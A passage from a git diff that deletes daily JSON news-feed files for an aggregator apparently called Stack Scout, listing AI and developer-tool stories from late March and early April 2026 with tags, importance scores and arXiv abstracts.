A couple of days earlier, Amazon had announced that Health AI, an LLM-based tool previously restricted to members of its One Medical service, would…", - "category": "ai_research" - }, - { - "title": "Build123d: A Python CAD programming library", - "url": "https://github.com/gumyr/build123d", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.49, - "date": "2026-03-29T20:58:22.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-31.json b/data/news-feed-2026-03-31.json deleted file mode 100644 index 80ba701..0000000 --- a/data/news-feed-2026-03-31.json +++ /dev/null @@ -1,271 +0,0 @@ -{ - "generated": "2026-06-05T00:44:31.546Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-31", - "article_count": 15, - "archived_story_count": 533, - "articles": [ - { - "title": "A Regression Framework for Understanding Prompt Component Impact on LLM Performance", - "url": "https://arxiv.org/abs/2603.26830", - "source": "ArXiv cs.LG (ML)", - "tags": [ - "open_source", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.26830v1 Announce Type: new Abstract: As large language models (LLMs) continue to improve and see further integration into software systems, so does the need to understand the conditions in which they will perform. We contribute a statistical framework for understanding the impact of specific prompt features on LLM performance. The approach extends previous explainable artificial intelligence (XAI) methods specifically to inspect LLMs by fitting regression models relating portions of the prompt to LLM evaluation. 
We apply our method to compare how two open-source models, Mistral-7B and GPT-OSS-20B, leverage the prompt to perform a simple arithmetic problem. Regression models of individual prompt portions explain 72% and 77% of variation in model performances, respectively. We find misinformation in the form of incorrect example query-answer pairs impedes both models from solving the arithmetic query, though positive examples do not find significant variability in the impact of positive and negative instructions - these prompts have contradictory effects on model performance. The framework serves as a tool for decision makers in critical scenarios to gain granular insight into how the prompt influences an LLM to solve a task.", - "category": "ai_research" - }, - { - "title": "LangChain Announces Enterprise Agentic AI Platform Built with NVIDIA", - "url": "https://blog.langchain.com/nvidia-enterprise/", - "source": "LangChain Blog", - "tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-03-16T21:31:28.000Z", - "summary": "Comprehensive agent engineering platform combined with NVIDIA AI enables enterprises to build, deploy, and monitor production-grade AI agents at scale Press Release SAN FRANCISCO, March 16, 2026 /PRNewswire/ — LangChain, the agent engineering company behind LangSmith and open-source frameworks that have surpassed 1 billion downloads, today announced a comprehensive integration", - "category": "ai_agents" - }, - { - "title": "Systematic debugging for AI agents: Introducing the AgentRx framework", - "url": "https://www.microsoft.com/en-us/research/blog/systematic-debugging-for-ai-agents-introducing-the-agentrx-framework/", - "source": "Microsoft Research Blog", - "tags": [ - "api_update", - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": 
"2026-03-12T16:38:45.000Z", - "summary": "As AI agents transition from simple chatbots to autonomous systems capable of managing cloud incidents, navigating complex web interfaces, and executing multi-step API workflows, a new challenge has emerged: transparency. When a human makes a mistake, we can usually trace the logic. But when an AI agent fails, perhaps by hallucinating a tool output or […] The post Systematic debugging for AI agents: Introducing the AgentRx framework appeared first on Microsoft Research .", - "category": "ai_research" - }, - { - "title": "Autonomous context compression", - "url": "https://blog.langchain.com/autonomous-context-compression/", - "source": "LangChain Blog", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-03-11T18:24:27.000Z", - "summary": "TL;DR: We've added a tool to the Deep Agents SDK (Python) and CLI that allows models to compress their own context windows at opportune times. Motivation Context compression is an action that reduces the information in an agent’s working memory. Older messages are replaced by", - "category": "ai_agents" - }, - { - "title": "Squish and Release: Exposing Hidden Hallucinations by Making Them Surface as Safety Signals", - "url": "https://arxiv.org/abs/2603.26829", - "source": "ArXiv cs.LG (ML)", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.26829v1 Announce Type: new Abstract: Language models detect false premises when asked directly but absorb them under conversational pressure, producing authoritative professional output built on errors they already identified. 
This failure - order-gap hallucination - is invisible to output inspection because the error migrates into the activation space of the safety circuit, suppressed but not erased. We introduce Squish and Release (S&R), an activation-patching architecture with two components: a fixed detector body (layers 24-31, the localized safety evaluation circuit) and a swappable detector core (an activation vector controlling perception direction). A safety core shifts the model from compliance toward detection; an absorb core reverses it. We evaluate on OLMo-2 7B using the Order-Gap Benchmark - 500 chains across 500 domains, all manually graded. Key findings: cascade collapse is near-total (99.8% compliance at O5); the detector body is binary and localized (layers 24-31 shift 93.6%, layers 0-23 contribute zero, p<10^-189); a synthetically engineered core releases 76.6% of collapsed chains; detection is the more stable attractor (83% restore vs 58% suppress); and epistemic specificity is confirmed (false-premise core releases 45.4%, true-premise core releases 0.0%). The contribution is the framework - body/core architecture, benchmark, and core engineering methodology - which is model-agnostic by design.", - "category": "ai_research" - }, - { - "title": "A Step Toward Federated Pretraining of Multimodal Large Language Models", - "url": "https://arxiv.org/abs/2603.26786", - "source": "ArXiv cs.LG (ML)", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.26786v1 Announce Type: new Abstract: The rapid evolution of Multimodal Large Language Models (MLLMs) is bottlenecked by the saturation of high-quality public data, while vast amounts of diverse multimodal data remain inaccessible in privacy-sensitive silos. 
Federated Learning (FL) offers a promising solution to unlock these distributed resources, but existing research focuses predominantly on fine-tuning, leaving the foundational pre-training phase largely unexplored. In this paper, we formally introduce the Federated MLLM Alignment (Fed-MA) task, a lightweight pre-training paradigm that freezes the vision encoder and LLM while collaboratively training the cross-modal projector. We identify two critical challenges in this setting: (i) parameter interference in aggregating local projectors; and (ii) gradient oscillations in one-pass collaborative SGD. To address these challenges, we propose Fed-CMP, a pioneering framework for federated MLLM pre-training. Fed-CMP employs Canonical Reliability-Aware Aggregation, which constructs a canonical space to decompose client projectors into a shared alignment basis and client-specific coefficients, then performs reliability-weighted fusion to suppress parameter interference. Furthermore, Fed-CMP introduces Orthogonality-Preserved Momentum, which applies momentum to the shared alignment basis via orthogonal projection, accumulating historical optimization directions while preserving geometric structure. We construct four federated pre-training scenarios based on public datasets, and extensive experiments validate that Fed-CMP significantly outperforms existing baselines.", - "category": "ai_research" - }, - { - "title": "TED: Training-Free Experience Distillation for Multimodal Reasoning", - "url": "https://arxiv.org/abs/2603.26778", - "source": "ArXiv cs.LG (ML)", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.26778v1 Announce Type: new Abstract: Knowledge distillation is typically realized by transferring a teacher model's knowledge into a student's parameters through supervised or reinforcement-based optimization. 
While effective, such approaches require repeated parameter updates and large-scale training data, limiting their applicability in resource-constrained environments. In this work, we propose TED, a training-free, context-based distillation framework that shifts the update target of distillation from model parameters to an in-context experience injected into the student's prompt. For each input, the student generates multiple reasoning trajectories, while a teacher independently produces its own solution. The teacher then compares the student trajectories with its reasoning and the ground-truth answer, extracting generalized experiences that capture effective reasoning patterns. These experiences are continuously refined and updated over time. A key challenge of context-based distillation is unbounded experience growth and noise accumulation. TED addresses this with an experience compression mechanism that tracks usage statistics and selectively merges, rewrites, or removes low-utility experiences. Experiments on multimodal reasoning benchmarks MathVision and VisualPuzzles show that TED consistently improves performance. On MathVision, TED raises the performance of Qwen3-VL-8B from 0.627 to 0.702, and on VisualPuzzles from 0.517 to 0.561 with just 100 training samples. 
Under this low-data, no-update setting, TED achieves performance competitive with fully trained parameter-based distillation while reducing training cost by over 5x, demonstrating that meaningful knowledge transfer can be achieved through contextual experience.", - "category": "ai_research" - }, - { - "title": "EpochX: Building the Infrastructure for an Emergent Agent Civilization", - "url": "https://arxiv.org/abs/2603.27304", - "source": "ArXiv cs.AI", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.27304v1 Announce Type: new Abstract: General-purpose technologies reshape economies less by improving individual tools than by enabling new ways to organize production and coordination. We believe AI agents are approaching a similar inflection point: as foundation models make broad task execution and tool use increasingly accessible, the binding constraint shifts from raw capability to how work is delegated, verified, and rewarded at scale. We introduce EpochX, a credits-native marketplace infrastructure for human-agent production networks. EpochX treats humans and agents as peer participants who can post tasks or claim them. Claimed tasks can be decomposed into subtasks and executed through an explicit delivery workflow with verification and acceptance. Crucially, EpochX is designed so that each completed transaction can produce reusable ecosystem assets, including skills, workflows, execution traces, and distilled experience. These assets are stored with explicit dependency structure, enabling retrieval, composition, and cumulative improvement over time. EpochX also introduces a native credit mechanism to make participation economically viable under real compute costs. Credits lock task bounties, budget delegation, settle rewards upon acceptance, and compensate creators when verified assets are reused. 
By formalizing the end-to-end transaction model together with its asset and incentive layers, EpochX reframes agentic AI as an organizational design problem: building infrastructures where verifiable work leaves persistent, reusable artifacts, and where value flows support durable human-agent collaboration.", - "category": "ai_research" - }, - { - "title": "Bitboard version of Tetris AI", - "url": "https://arxiv.org/abs/2603.26765", - "source": "ArXiv cs.AI", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.26765v1 Announce Type: new Abstract: The efficiency of game engines and policy optimization algorithms is crucial for training reinforcement learning (RL) agents in complex sequential decision-making tasks, such as Tetris. Existing Tetris implementations suffer from low simulation speeds, suboptimal state evaluation, and inefficient training paradigms, limiting their utility for large-scale RL research. To address these limitations, this paper proposes a high-performance Tetris AI framework based on bitboard optimization and improved RL algorithms. First, we redesign the Tetris game board and tetrominoes using bitboard representations, leveraging bitwise operations to accelerate core processes (e.g., collision detection, line clearing, and Dellacherie-Thiery Features extraction) and achieve a 53-fold speedup compared to OpenAI Gym-Tetris. Second, we introduce an afterstate-evaluating actor network that simplifies state value estimation by leveraging Tetris afterstate property, outperforming traditional action-value networks with fewer parameters. Third, we propose a buffer-optimized Proximal Policy Optimization (PPO) algorithm that balances sampling and update efficiency, achieving an average score of 3,829 on 10x10 grids within 3 minutes. 
Additionally, we develop a Python-Java interface compliant with the OpenAI Gym standard, enabling seamless integration with modern RL frameworks. Experimental results demonstrate that our framework enhances Tetris's utility as an RL benchmark by bridging low-level bitboard optimizations with high-level AI strategies, providing a sample-efficient and computationally lightweight solution for scalable sequential decision-making research.", - "category": "ai_research" - }, - { - "title": "Together AI Brings NVIDIA Nemotron 3 to Developers on Day 0", - "url": "https://www.together.ai/blog/nvidia-nemotron-3-super", - "source": "Together AI Blog", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-03-11T00:00:00.000Z", - "summary": "NVIDIA Nemotron 3 Super is now available on Together AI Dedicated Inference, delivering efficient multi-agent reasoning, a 1M-token context window, and production-grade deployment on managed infrastructure.", - "category": "ai_tools" - }, - { - "title": "Together Evaluations now supports comparing top commercial APIs vs. open source models", - "url": "https://www.together.ai/blog/together-evaluations-v2", - "source": "Together AI Blog", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-02-02T00:00:00.000Z", - "summary": "Together Evaluations now supports OpenAI, Anthropic, and Google models for cross-provider benchmarking. 
Compare open-source, fine-tuned, and proprietary models side-by-side to make data-driven decisions on quality, cost, and performance—all in one platform.", - "category": "ai_tools" - }, - { - "title": "Introducing deploy cli", - "url": "https://blog.langchain.com/introducing-deploy-cli/", - "source": "LangChain Blog", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.69, - "date": "2026-03-16T17:20:21.000Z", - "summary": "We’re excited to introduce the deploy cli, a new set of commands within the langgraph-cli package that makes it simple to deploy and manage agents directly from the command line. The first command in this new set, langgraph deploy , lets you deploy an agent to LangSmith Deployment in", - "category": "ai_agents" - }, - { - "title": "Introducing LangSmith Sandboxes: Secure Code Execution for Agents", - "url": "https://blog.langchain.com/introducing-langsmith-sandboxes-secure-code-execution-for-agents/", - "source": "LangChain Blog", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.62, - "date": "2026-03-17T15:51:07.000Z", - "summary": "Spin up a sandbox in a single line of code with the LangSmith SDK. 
Now in Private Preview.", - "category": "ai_agents" - }, - { - "title": "Open SWE: An Open-Source Framework for Internal Coding Agents", - "url": "https://blog.langchain.com/open-swe-an-open-source-framework-for-internal-coding-agents/", - "source": "LangChain Blog", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.62, - "date": "2026-03-17T15:30:00.000Z", - "summary": "Built on Deep Agents and LangGraph, Open SWE provides the core architectural components for internal coding agents.", - "category": "ai_agents" - }, - { - "title": "Exclusive: Runway launches $10M fund, Builders program to support early-stage AI startups", - "url": "https://techcrunch.com/2026/03/31/exclusive-runway-launches-10m-fund-builders-program-to-support-early-stage-ai-startups/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-31T14:00:00.000Z", - "summary": "Runway is launching a $10 million fund and startup program to back companies building with its AI video models, as it pushes toward interactive, real-time “video intelligence” applications.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-01.json b/data/news-feed-2026-04-01.json deleted file mode 100644 index 3d3bdd2..0000000 --- a/data/news-feed-2026-04-01.json +++ /dev/null @@ -1,253 +0,0 @@ -{ - "generated": "2026-06-05T00:44:31.735Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-01", - "article_count": 15, - "archived_story_count": 894, - "articles": [ - { - "title": "MiniMax Releases M2.1: An Enhanced M2 Version with Features like Multi-Coding Language Support, API Integration, and Improved Tools for Structured Coding", - "url": 
"https://www.marktechpost.com/2025/12/25/minimax-releases-m2-1-an-enhanced-m2-version-with-features-like-multi-coding-language-support-api-integration-and-improved-tools-for-structured-coding/", - "source": "MarkTechPost", - "tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "matching_tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.743Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Agent-Infra Releases AIO Sandbox: An All-in-One Runtime for AI Agents with Browser, Shell, Shared Filesystem, and MCP", - "url": "https://www.marktechpost.com/2026/03/29/agent-infra-releases-aio-sandbox-an-all-in-one-runtime-for-ai-agents-with-browser-shell-shared-filesystem-and-mcp/", - "source": "MarkTechPost", - "tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.720Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "UT Austin and ServiceNow Research Team Releases AU-Harness: An Open-Source Toolkit for Holistic Evaluation of Audio LLMs", - "url": "https://www.marktechpost.com/2025/09/14/ut-austin-and-servicenow-research-team-releases-au-harness-an-open-source-toolkit-for-holistic-evaluation-of-audio-llms/", - "source": "MarkTechPost", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.737Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Google AI Releases Veo 3.1 Lite: Giving Developers Low Cost High Speed Video Generation via The Gemini API", - "url": "https://www.marktechpost.com/2026/03/31/google-ai-releases-veo-3-1-lite-giving-developers-low-cost-high-speed-video-generation-via-the-gemini-api/", - "source": "MarkTechPost", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - 
"api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.724Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Improve coding agents’ performance with Gemini API Docs MCP and Agent Skills.", - "url": "https://blog.google/innovation-and-ai/technology/developers-tools/gemini-api-docsmcp-agent-skills/", - "source": "Google AI Blog", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-04-01T09:34:55.903Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "AnnouncementsFeb 5, 2026Introducing Claude Opus 4.6We’re upgrading our smartest model. Across agentic coding, computer use, tool use, search, and finance, Opus 4.6 is an industry-leading model, often by wide margin.", - "url": "https://www.anthropic.com/news/claude-opus-4-6", - "source": "Anthropic News", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-01T09:34:54.348Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "Show HN: CLI to order groceries via reverse-engineered REWE API (Haskell)", - "url": "https://github.com/yannick-cw/korb", - "source": "Hacker News", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.74, - "date": "2026-03-30T06:45:58.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Stability AI Announces Investment from WPP and New Partnership to Shape the Future of Media and Entertainment Production", - "url": "https://stability.ai/news-updates/stability-ai-announces-investment-from-wpp-and-new-partnership-to-shape-the-future-of-media-and-entertainment-production", - "source": "Stability AI Blog", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-01T09:35:11.176Z", - "summary": null, - 
"category": "creative_tools" - }, - { - "title": "NVIDIA Releases New AI Models and Developer Tools to Advance Autonomous Vehicle Ecosystem", - "url": "https://blogs.nvidia.com/blog/autonomous-vehicle-ecosystem-ai-models-developer-tools/", - "source": "NVIDIA AI Blog", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-01T09:35:05.180Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "An Implementation of IWE’s Context Bridge as an AI-Powered Knowledge Graph with Agentic RAG, OpenAI Function Calling, and Graph Traversal", - "url": "https://www.marktechpost.com/2026/03/27/an-implementation-of-iwes-context-bridge-as-an-ai-powered-knowledge-graph-with-agentic-rag-openai-function-calling-and-graph-traversal/", - "source": "MarkTechPost", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.747Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "How to Design a Fully Functional Enterprise AI Assistant with Retrieval Augmentation and Policy Guardrails Using Open Source AI Models", - "url": "https://www.marktechpost.com/2025/10/22/how-to-design-a-fully-functional-enterprise-ai-assistant-with-retrieval-augmentation-and-policy-guardrails-using-open-source-ai-models/", - "source": "MarkTechPost", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.735Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Salesforce AI Research Releases VoiceAgentRAG: A Dual-Agent Memory Router that Cuts Voice RAG Retrieval Latency by 316x", - "url": "https://www.marktechpost.com/2026/03/30/salesforce-ai-research-releases-voiceagentrag-a-dual-agent-memory-router-that-cuts-voice-rag-retrieval-latency-by-316x/", - "source": "MarkTechPost", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 
1, - "date": "2026-04-01T09:35:03.718Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Hugging Face Releases TRL v1.0: A Unified Post-Training Stack for SFT, Reward Modeling, DPO, and GRPO Workflows", - "url": "https://www.marktechpost.com/2026/04/01/hugging-face-releases-trl-v1-0-a-unified-post-training-stack-for-sft-reward-modeling-dpo-and-grpo-workflows/", - "source": "MarkTechPost", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.710Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Salesforce announces an AI-heavy makeover for Slack, with 30 new features", - "url": "https://techcrunch.com/2026/03/31/salesforce-announces-an-ai-heavy-makeover-for-slack-with-30-new-features/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-01T09:34:58.227Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "How I contributed a new model to the Transformers library using Codex 1 day ago • 34", - "url": "https://huggingface.co/blog/nielsr/contributing-to-transformers-with-codex", - "source": "Hugging Face Blog", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-01T09:34:55.910Z", - "summary": null, - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-02.json b/data/news-feed-2026-04-02.json deleted file mode 100644 index d7ef7ba..0000000 --- a/data/news-feed-2026-04-02.json +++ /dev/null @@ -1,181 +0,0 @@ -{ - "generated": "2026-06-05T00:44:32.037Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-02", - "article_count": 11, - "archived_story_count": 120, - "articles": [ - { - "title": "Google releases Gemma 4 under Apache 2.0 — and that license change may matter more than benchmarks", - 
"url": "https://venturebeat.com/technology/google-releases-gemma-4-under-apache-2-0-and-that-license-change-may-matter", - "source": "VentureBeat AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-02T18:00:23.348Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Cursor Launches a New AI Agent Experience to Take On Claude Code and Codex", - "url": "https://www.wired.com/story/cusor-launches-coding-agent-openai-anthropic/", - "source": "Wired AI", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-02T18:00:15.314Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Google announces Gemma 4 open AI models, switches to Apache 2.0 license", - "url": "https://arstechnica.com/ai/2026/04/google-announces-gemma-4-open-ai-models-switches-to-apache-2-0-license/", - "source": "Ars Technica AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 0.98, - "date": "2026-04-02T18:00:16.217Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Z.ai Launches GLM-5V-Turbo: A Native Multimodal Vision Coding Model Optimized for OpenClaw and High-Capacity Agentic Engineering Workflows Everywhere", - "url": "https://www.marktechpost.com/2026/04/01/z-ai-launches-glm-5v-turbo-a-native-multimodal-vision-coding-model-optimized-for-openclaw-and-high-capacity-agentic-engineering-workflows-everywhere/", - "source": "MarkTechPost", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-02T06:00:27.059Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "IBM Announces Strategic Collaboration with Arm", - "url": 
"https://newsroom.ibm.com/2026-04-02-ibm-announces-strategic-collaboration-with-arm-to-shape-the-future-of-enterprise-computing", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.98, - "date": "2026-04-02T08:48:44.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "IBM Releases Granite 4.0 3B Vision: A New Vision Language Model for Enterprise Grade Document Data Extraction", - "url": "https://www.marktechpost.com/2026/04/01/ibm-releases-granite-4-0-3b-vision-a-new-vision-language-model-for-enterprise-grade-document-data-extraction/", - "source": "MarkTechPost", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9, - "date": "2026-04-02T18:00:19.625Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Google releases Gemma 4 open models", - "url": "https://deepmind.google/models/gemma/gemma-4/", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9, - "date": "2026-04-02T16:10:54.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Lemonade by AMD: a fast and open source local LLM server using GPU and NPU", - "url": "https://lemonade-server.ai", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.8200000000000001, - "date": "2026-04-02T11:04:51.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Artemis II, NASA's boldest mission in generations, launches crew to the Moon", - "url": "https://arstechnica.com/space/2026/04/four-astronauts-depart-for-the-moon-with-a-fiery-send-off-from-cape-canaveral/", - "source": "Ars Technica AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.6599999999999999, - "date": "2026-04-02T18:00:16.230Z", - "summary": null, - "category": 
"tech_general" - }, - { - "title": "Delve allegedly forked an open-source tool and sold it as its own", - "url": "https://techcrunch.com/2026/04/01/the-reputation-of-troubled-yc-startup-delve-has-gotten-even-worse/", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6599999999999999, - "date": "2026-04-02T15:03:08.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Python API usage", - "url": "https://github.com/datasette/datasette-llm/blob/0.1a6/README.md#usage", - "source": "Simon Willison's Blog", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.6599999999999999, - "date": "2026-04-02T06:00:31.526Z", - "summary": null, - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-03.json b/data/news-feed-2026-04-03.json deleted file mode 100644 index 2773b50..0000000 --- a/data/news-feed-2026-04-03.json +++ /dev/null @@ -1,119 +0,0 @@ -{ - "generated": "2026-06-05T00:44:32.201Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-03", - "article_count": 7, - "archived_story_count": 351, - "articles": [ - { - "title": "Arcee AI Releases Trinity Large Thinking: An Apache 2.0 Open Reasoning Model for Long-Horizon Agents and Tool Use", - "url": "https://www.marktechpost.com/2026/04/02/arcee-ai-releases-trinity-large-thinking-an-apache-2-0-open-reasoning-model-for-long-horizon-agents-and-tool-use/", - "source": "MarkTechPost", - "tags": [ - "api_update", - "product_launch", - "open_source" - ], - "matching_tags": [ - "api_update", - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-03T06:00:57.447Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "TII Releases Falcon Perception: A 0.6B-Parameter Early-Fusion Transformer for Open-Vocabulary Grounding and Segmentation from Natural Language Prompts", - "url": 
"https://www.marktechpost.com/2026/04/03/tii-releases-falcon-perception-a-0-6b-parameter-early-fusion-transformer-for-open-vocabulary-grounding-and-segmentation-from-natural-language-prompts/", - "source": "MarkTechPost", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-03T14:05:05.318Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "New ways to balance cost and reliability in the Gemini API", - "url": "https://blog.google/innovation-and-ai/technology/developers-tools/introducing-flex-and-priority-inference/", - "source": "Google AI Blog", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.94, - "date": "2026-04-03T06:00:46.321Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "C89cc.sh – standalone C89/ELF64 compiler in pure portable shell", - "url": "https://gist.github.com/alganet/2b89c4368f8d23d033961d8a3deb5c19", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.74, - "date": "2026-04-01T08:41:49.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Your Agent Has 12 Blind Spots You Can't See Yet. This Audit Prompt Finds Them. 
(+ Skill Package)", - "url": "https://natesnewsletter.substack.com/p/your-agent-has-12-blind-spots-you", - "source": "Nate's Newsletter", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.6799999999999999, - "date": "2026-04-03T14:05:06.150Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Google Vids extension", - "url": "https://chromewebstore.google.com/detail/google-vids-screen-record/iklnnbgdcppplombffihcijanngoeifm", - "source": "The Verge AI", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.6799999999999999, - "date": "2026-04-03T06:01:01.783Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Post Mortem: axios NPM supply chain compromise", - "url": "https://github.com/axios/axios/issues/10636", - "source": "Simon Willison's Blog", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.6799999999999999, - "date": "2026-04-03T00:00:19.000Z", - "summary": null, - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-04.json b/data/news-feed-2026-04-04.json deleted file mode 100644 index cd76d7c..0000000 --- a/data/news-feed-2026-04-04.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "generated": "2026-06-05T00:44:32.356Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-04", - "article_count": 5, - "archived_story_count": 236, - "articles": [ - { - "title": "@CloudflareDev — Gemma 4 Just Landed on Cloudflare Workers AI — 256K Context, Tool Calling, Vision", - "url": "https://x.com/CloudflareDev/status/2040459229039940068", - "source": "Aligned News 